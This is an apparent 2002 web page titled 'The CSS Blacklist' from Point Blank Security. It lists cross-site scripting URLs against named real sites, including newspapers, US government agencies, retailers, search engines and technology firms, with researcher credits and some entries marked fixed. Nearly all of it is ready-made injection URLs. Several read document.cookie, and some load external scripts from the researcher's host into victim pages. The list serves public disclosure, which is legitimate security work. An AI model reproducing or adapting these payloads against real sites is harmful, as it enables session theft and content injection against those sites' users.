The CSS Blacklist...
Last Updated: November 16, 2002

Disclaimer:
The links below are provided "AS IS" and may be used only for legitimate security analysis purposes. Point Blank Security does not in any way, shape or form condone the unauthorized access of systems or privileged information, and specifically prohibits the use or reproduction of this information for such purposes. In no event shall Point Blank Security be liable for any damages whatsoever arising out of or in connection with the use or dissemination of this information. Any use of this information is at the user's own risk.

News Media

LA Times
01) Subversion of Information Vulnerability
http://latimes.com/search/lat_all.jsp?Query=</script>
Credit: Jeremiah Jacks

OC Register
01) http://www.ocregister.com/cgi-bin/htdig/htsearch2?words=">><script>alert%28'test'%29%3B</script>
Credit: Jeremiah Jacks - FIXED

NY Times
01) Subversion of Information Vulnerability
http://www.nytimes.com/corrections.html?pagewanted=">><script>document.writeln('('src=http://pointblanksecurity.com/css/nytimes.js><\/script>');</script>
Credit: Jeremiah Jacks
02) http://www.nytimes.com/auth/login?URI=">><script>alert('nytimes')</script>
Credit: Dmitry Golubev - FIXED
03) http://realestate.nytimes.com/rentals/SearchZipWId.asp?p=">><script>alert('test');</script>
Credit: Jeremiah Jacks
04) http://realestate.nytimes.com/rentals/search.asp?ros=r&ST=NY&CN=">><script>alert('test');</script>&p=C
Credit: Jeremiah Jacks - FIXED

The Washington Post
01) Subversion of Information Vulnerability
http://www.washingtonpost.com/ac3/ContentServer?pagename=world/worldsearch&COUNTRY=.com/css/washpost.js></script>
Credit: Jeremiah Jacks
02) Subversion of Information Vulnerability
http://www.washingtonpost.com/ac3/ContentServer?pagename=weather&zipcode=post.js></script>
Credit: Jeremiah Jacks
03) http://mp3.washingtonpost.com/browse/index.shtml?band_name=><script>alert('test');</script>&genre_id=100&hometown_id=100
Credit: Jeremiah Jacks - FIXED
04) http://eg.washingtonpost.com/search?cslink=cs_keyword_home&type=bridge&query=%3Cscript%3Ealert%28%27test%27%29%3B%3C%2Fscript%3E
Credit: Jeremiah Jacks

Newsbytes
01) Subversion of Information Vulnerability
http://www.newsbytes.com/cgi-bin/udt/mlm.user.register?client.id=newsbytes&email.address=">><script>function+Chr(code){return+String.fromCharCode(code);}document.writeln('('http://pointblanksecurity.com/css/newsbytes.js><\/script>');</script>
Credit: Jeremiah Jacks
02) Subversion of Information Vulnerability
http://www.newsbytes.com/cgi-bin/udt/mlm.user.view?client.id=newsbytes&user.email=-->><script>function+Chr(code){return+String.fromCharCode(code);}document.writeln('('http://pointblanksecurity.com/css/newsbytes.js><\/script>');</script>
Credit: Jeremiah Jacks

Newsday
01) http://www.newsday.com/search/ny_all.jsp?Query=-%3E%3Cscript%3Ealert%28%27test%27%29%3B%3C%2Fscript%3E%3C%21--
Credit: Gary Jones - FIXED

American Stock Exchange
01) http://search.amex.com/a/search_results.asp?query=-->><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED

NYSE
01) http://www.nyse.com/s97is.vts?Action=FilterSearch&Filter=">><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks - FIXED

Discovery Channel
01) http://dsc.discovery.com/search/results.jsp?channel=DSC&srchtxt=nss">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev

People Magazine
01) http://people.aol.com/people/search/results/1,11400,,00.html?query=><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED

CBS MarketWatch
01) http://cbs.marketwatch.com/tools/quotes/basic.asp?symb=">><script>alert('test');</script>
Credit: Jeremiah Jacks

TIME Magazine
01) http://www.time.com/time/searchresults?summaries=yes&search_type=simple&query=><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED

WorldNews
01) http://www.worldnews.com/?template=><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED

BBC
01) http://www.bbc.co.uk/cgi-perl/h2/h2.cgi?x=">><script>alert("beep!")</script>&state=password&board=mc
Credit: Dmitry Golubev - FIXED

The Register
01) http://www.theregister.co.uk/cgi-bin/dispatcher.cgi?url=nss><script>alert(document.location)</script>
Credit: Dmitry Golubev - FIXED

CNET
01) http://cnet.search.com/search?q=">><script>alert("cnet")</script><"
Credit: Dmitry Golubev - FIXED

CNN Money - LookSmart
01) http://cnnfn.looksmart.com/r_search?key=><script>alert('test');</script>
Credit: Jeremiah Jacks

CNN.com - LookSmart
01) http://cnn.looksmart.com/r_search?&izch&pin=">><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED

BusinessWeek
01) http://search.businessweek.com/search97cgi/s97_cgi?action=FilterSearch&filter=><script>alert('test');</script>
Credit: Jeremiah Jacks

The Boston Globe
01) http://search.boston.com/globe.vts?Action=><script>alert('yee+haw');</script>
Credit: Esther Matut

ESPN
01) http://keyword.espn.go.com/keyword/espnlookup?qt=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E
Credit: Esther Matut - FIXED

Government Agencies

California, USA
01) http://www.ca.gov/state/portal/myca_search_results.jsp?sSearchString=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E
Credit: Esther Matut

FirstGOV
01) http://www.firstgov.gov/fedsearch4/index.jsp?mt0=all&ms0=should&mw0=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E&db=www&st=AS
Credit: Esther Matut
02) http://www.firstgov.gov/external/><script>alert('test');</script>
Credit: Jeremiah Jacks

US DoJ
01) http://www.ojp.usdoj.gov/search97cgi/s97_cgi?action=Action=FilterSearch&Filter=">><script>alert("dep%20of%20justice@!")</script>
Credit: Gary Jones

US Federal Reserve
01) http://search.federalreserve.gov/search97cgi/s97_cgi.exe?Action=FilterSearch&Filter=">><script>alert("gimme%20some%20money!%20please?%20:)")</script>
Credit: Gary Jones - FIXED

The White House
01) http://www.whitehouse.gov/cgi-bin/good-bye.cgi?url=/">><script>alert("white+house!")</script>
Credit: Dmitry Golubev - FIXED

The FBI
01) http://www.fbi.gov/cgi-bin/outside.cgi?/">><script>alert("FBI")</script>
Credit: Dmitry Golubev - FIXED

Department of Defense(DoD)
01) http://www.defenselink.mil/search97/s97is.vts?Action=FilterSearch&Filter=">><script>alert("defend")</script>
Credit: Dmitry Golubev

National Institutes of Health
01) http://search1.nci.nih.gov/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED

U.S. Census Bureau
01) http://www.census.gov/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED

U.S. House of Representatives
01) http://wwws.house.gov/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED

Centers for Disease Control
01) http://search.cdc.gov/search97cgi/s97_cgi.exe?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED

FFIEC
01) http://search.ffiec.gov/search97cgi/s97_cgi.exe?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED

FDIC
01) http://www.fdic.gov/search97cgi/s97_cgi.exe?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED

FedStats
01) http://www.fedstats.gov/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED

Dept. of Education
01) http://www.ed.gov/search/searchResList.jsp?st=0&colParam=ED&lk=1&qt=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E
Credit: Esther Matut - FIXED

Online Stores

Office Max
01) http://www.officemax.com/max/solutions/product/thumbnail.jsp?expansionOID=>><script>alert('test');</script>
Credit: Jeremiah Jacks

JCPenney
01) http://www.jcpenney.com/jcp/Department.asp?DeptID=9452&CatID=9452&CatTyp=DEP&Dep=><script>alert('test');</script>
Credit: Jeremiah Jacks
02) http://www.jcpenney.com/jcp/Products.asp?DeptID=469&CatID=10542&CatTyp=DEP&ItemTyp=G&GrpTyp=SIZ&ItemID=040f564&ProdSeq=6&OffSet=6&ProdCount=6&Cat=sweaters><script>alert('test');</script>&Dep=men%27s&PCat=casual+shirts&PCatID=10417417
Credit: Jeremiah Jacks
03) http://www.jcpenney.com/jcp/Products.asp?DeptID=469&CatID=10079&CatTyp=DEP&ItemTyp=G&GrpTyp=SIZ&ItemID=02ac129&ProdSeq=2&OffSet=2&ProdCount=3&Cat=jean+jackets&Dep=men%27s&PCat=jeans&PCatID=3657&SearchString=><script>alert('test');</script>
Credit: Jeremiah Jacks

eCOST
01) http://www.ecost.com/ecost/search/powersearch.asp?search_string=">><script>alert('hi');</script>
Credit: Gary Jones

Banana Republic
01) http://www.bananarepublic.com/SubDepartment.asp?loc=">><script>alert('test');</script>
Credit: Jeremiah Jacks

Barnes & Noble
01) http://shop.barnesandnoble.com/booksearch/results.asp?WRD=%3Cscript%3Ealert%28document%2Ecookie%29%3B%3C%2Fscript%3E
Credit: Gary Jones - FIXED
02) http://shop.barnesandnoble.com/shop/cart.asp?vcqty=">><script>alert('test');</script>A+href="
Credit: Jeremiah Jacks

Office Depot
01) http://www.officedepot.com/shop/search/noresults.asp?searchquery=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E
Credit: Gary Jones

Sears
01) http://www.sears.com/sr/mercado/searchall.jsp?keyword=><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks - FIXED

BlueLight (K-Mart)
01) http://www.bluelight.com/searchHandler/index.jsp?keywords=><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks

McDonald's
01) http://www.mcdonalds.com/cgi-bin/search/search.pl?terms=><script>alert('hi')</script>
Credit: Dmitry Golubev

Philip Morris Home
01) http://www.philipmorris.com/search/search_results.asp?criteria=><script>alert(document.cookie)</script>
Credit: Dmitry Golubev

WalMart
01) http://www.walmart.com/catalog/search.gsp?search_constraint=0&search_query=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E
Credit: Esther Matut

Best Buy
01) http://www.bestbuy.com/Accessories/Acc_list.asp?m=">><script>alert('test');</script>
Credit: Jeremiah Jacks

CompUSA - https://www.compusa.com/shop/xt_account_logon.asp?xt_action=lookup&frm_email='&frm_password='
01) https://www.compusa.com/shop/account_logon.asp?errors=><script>alert(document.cookie)</script>
Credit: Dmitry Golubev

Search Engines

Rpmfind.net
01) http://www.rpmfind.net/linux/rpm2html/search.php?query=nss">><script>alert(document.location)</script>
Credit: Dmitry Golubev

Alta Vista
01) http://altavista.com/sites/search/web?q=><script>alert('bleh');</script>
Credit: Jeremiah Jacks - FIXED

Google
01) http://www.google.com/search?q=pointblanksecurity.com/">><script>alert(document.cookie)</script>
Credit: Jeremiah Jacks - FIXED

Hot Wired
01) http://search.hotwired.com/search97/s97is.vts?Action=FilterSearch&Filter=">><script>alert("wired!")</script>
Credit: Dmitry Golubev - FIXED

Netscape
01) http://mpsearch.netscape.com/BizSearch?keyword=><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks

AOL
01) http://search.hometown.aol.com/find.adp?query=">><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks

Technology

CyberArmy
01) http://www.cyberarmy.com/search/search.cgi?query=><script>alert("Test")</script>
Credit: Joerg Niebauer - FIXED

Red Hat
01) http://www.redhat.com/apps/search/results.html?search:query_cb=nss">><script>alert("redhat")</script><"
Credit: Dmitry Golubev - FIXED

Microsoft
01) http://msevents.microsoft.com/isapi/events/usa/enu/search_results.asp?KW=''>><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks - FIXED
02) http://www.microsoft.com/usa/js/sendfriend.asp?sAddress=">><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks - FIXED
03) (Netscape Only) http://search.microsoft.com/us/shop/SearchMS25.asp?qu=";alert('test');//&so=RECCNT&boolean=ALL&intCat=0&nq=NEW&p=1
Credit: Jeremiah Jacks

WHOIS.net
01) http://whois.net/whois.cgi2?d=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E
Credit: Gary Jones - FIXED
02) http://www.whois.net/checkDomain.cgi2?domain=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E&tld=com
Credit: Esther Matut - FIXED

Yellow Pages
01) http://www.yellowpages.com/yellowpages/scripts/search.dll?ep=0&query=><script>+alert('hi')+</script>&qstate=AL
Credit: Gary Jones - FIXED

IEEE
01) http://ieeexplore.ieee.org/search97/s97is.vts?Action=FilterSearch&Filter=">><script>alert('document.cookie')</script>
Credit: Jeremiah Jacks - FIXED

Electronic Frontier Foundation(EFF)
01) http://www.eff.org/cgi-bin/htsearch?exclude=">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev

Chaos Computer Club(Germany)
01) http://www.ccc.de/cgi-bin/feedback.pl?page=><script>alert("ccc")</script>
Credit: Dmitry Golubev

IBM
01) http://commerce.www.ibm.com/cgi-bin/ncommerce/AdvantageCode?shoprfnbr=1&cntry=840&lang=en_US&cntrfnbr=1&q=">><script>alert("ibm")</script>
Credit: Dmitry Golubev - FIXED

SourceForge
01) http://sourceforge.net/search/?words=">><script>alert(document.location)</script>
Credit: Dmitry Golubev

PHP.net
01) http://www.php.net/cal.php?a=">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev - FIXED

Adobe
01) http://www.adobe.de/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones

Apple
01) http://search03.apple.com/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("me%20likes%20red%20apples")</script>
Credit: Gary Jones

Snort.org Discussion
01) http://snort.rapidnet.com/forum.asp?forum_id=3&forum_title=><script>alert(document.cookie)</script>
Credit: Dmitry Golubev - FIXED

Nokia (1st is Netscape only)
01) http://www.nokia.com/flashd/flash_redir.html?flash=">><script>alert("test")</script><"
Credit: Dmitry Golubev
02) http://www.nokia.com/find/forum/search.jsp?qt=nrw&la=">><script>alert("test")</script>
Credit: Dmitry Golubev

Cisco
01) http://www.cisco.com/><script>alert("test")</script>
Credit: Dmitry Golubev

FreeBSD
01) http://www.freebsd.org/><script>alert("test")</script>
Credit: Dmitry Golubev - FIXED

Gibson Research Center
01) https://grc.com/x/news.exe?cmd=xover&group=><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED

Hewlett-Packard
01) http://productfinder.support.hp.com/tps/ProductFinder?h_query=%3E%3Cscript%3Ealert%28%27test%27%29%3B%3C%2Fscript%3E%3C%21
Credit: Gary Jones - FIXED

DSL Reports
01) http://www.dslreports.com/information/kb/</title>><script>alert('test');</script><title>
Credit: Jeremiah Jacks

Verio
01) https://home.verio.com/lookup/index.cfm?sld=><script>alert('test');</script>
Credit: Gary Jones - FIXED

Oracle
01) http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=">><script>alert('test');</script>&p_person_id=100&p_doc_location_array=Place+Holder&p_doc_location_array=document&p_location_array=&p_keyword_array=&p_value_array=&p_date_begin=q_date&p_date_end=q_date
Credit: Jeremiah Jacks - FIXED
02) http://www.oracle.com/pls/ebn/search.simple?p_string=><script>alert(document.cookie);</script>
Credit: Esther Matut - FIXED

Miscellaneous

eTrade
01) Click Here...
Credit: Jeremiah Jacks - FIXED

Hollywood.com
01) http://www.hollywood.com/search_results.asp?keywords=><script>alert(document.cookie)</script>
Credit: Dmitry Golubev - FIXED
02) http://ads.hollywood.com/ads/popup.asp?con=><script>alert(document.cookie);</script>&TO=90000000
Credit: Jeremiah Jacks

RealNetworks
01) http://realguide.real.com/games/index.html?src=">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev - FIXED
02) http://realguide.real.com/search/?searchterm=">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev
03) http://realguide.real.com/info/?page=search&section=">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev - FIXED
04) http://realguide.real.com/games/?s=">><script>alert('community')</script>
Credit: Jeremiah Jacks

PERL.com
01) CLICK HERE to log into perl.com...
Credit: Jeremiah Jacks

EXCITE
01) http://registration.excite.com/excitereg/login.jsp?return_url=">><script>alert("nice")</script>
Credit: Dmitry Golubev - FIXED

Netidentity
01) http://www.netidentity.com/default.asp?d=><script>alert(document.cookie)</script>
Credit: Dmitry Golubev - FIXED

Datek
01) http://www.datek.com/popinframe.html?symb=%22%3E%3Cscript%3Ealert%28%27test%27%29%3B%3C%2Fscript%3E&ref=http%3A%2F%2Fcustom.marketwatch.com%2Fcustom%2Fdatek-com%2Fpub%2Fpub-qcn.asp
Credit: Jeremiah Jacks - FIXED

AT&T
01) http://search.att.com/search?action=><script>%20alert('hi');%20</script>
Credit: Gary Jones - FIXED

Corel
01) http://www3.corel.com/cgi-bin/gx.cgi/AppLogic+FTContentServer?pagename=Corel%2FAdvancedSearch%2FResults&assets=all&query=%3Cscript%3E+AND+alert%28%27hi%27%29%3B+AND+%3C%2Fscript%3E&plainText=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E
Credit: Gary Jones

Tower Records
01) http://towermusic.endeca.com/towermusic?n=0&att=All_Music+%3Cscript%3E+alert%28%27hi%27%29%3B++%3C%2Fscript%3E&cs=%3Cscript%3E+alert%28%27hi%27%29%3B++%3C%2Fscript%3E&csn=3&csr=1&dym=1
Credit: Esther Matut

MapQuest
01) http://mapquest.com/directions/main.adp?1a=">><script>alert('test');</script>
Credit: Jeremiah Jacks